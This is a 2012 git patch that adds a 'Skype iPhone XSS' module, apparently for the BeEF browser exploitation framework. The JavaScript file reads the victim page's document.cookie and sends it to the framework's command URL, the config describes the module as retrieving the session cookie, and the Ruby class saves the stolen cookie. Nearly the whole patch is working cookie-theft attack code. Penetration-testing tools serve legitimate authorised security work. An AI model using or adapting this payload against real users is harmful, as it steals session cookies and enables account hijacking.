From 8c74fdd6809f1c30ce72fa965e25f2a191bdf33a Mon Sep 17 00:00:00 2001
From: asaafan <a.m.saafan@gmail.com>
Date: Fri, 9 Mar 2012 01:55:44 +0200
Subject: [PATCH] Adding branch for Skype XSS module

---
 modules/exploits/skype_xss/command.js  | 21 +++++++++++++++++++
 modules/exploits/skype_xss/config.yaml | 25 +++++++++++++++++++++++
 modules/exploits/skype_xss/module.rb   | 28 ++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100644 modules/exploits/skype_xss/command.js
 create mode 100644 modules/exploits/skype_xss/config.yaml
 create mode 100644 modules/exploits/skype_xss/module.rb

diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js
new file mode 100644
index 000000000..7f0049186
--- /dev/null
+++ b/modules/exploits/skype_xss/command.js
@@ -0,0 +1,21 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
+
+});
+
diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml
new file mode 100644
index 000000000..fd90b2cf4
--- /dev/null
+++ b/modules/exploits/skype_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        skype_xss:
+            enable: true
+            category: "Exploits"
+            name: "Skykpe iPhone XSS"
+            description: "This module will retrieve the session cookie from the current page."
+            authors: ["saafan"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb
new file mode 100644
index 000000000..852361629
--- /dev/null
+++ b/modules/exploits/skype_xss/module.rb
@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_cookie < BeEF::Core::Command
+
+  def post_execute
+  
+	##Stub##
+	
+	
+    content = {}
+    content['cookie'] = @datastore['cookie']
+    save content
+  end
+
+end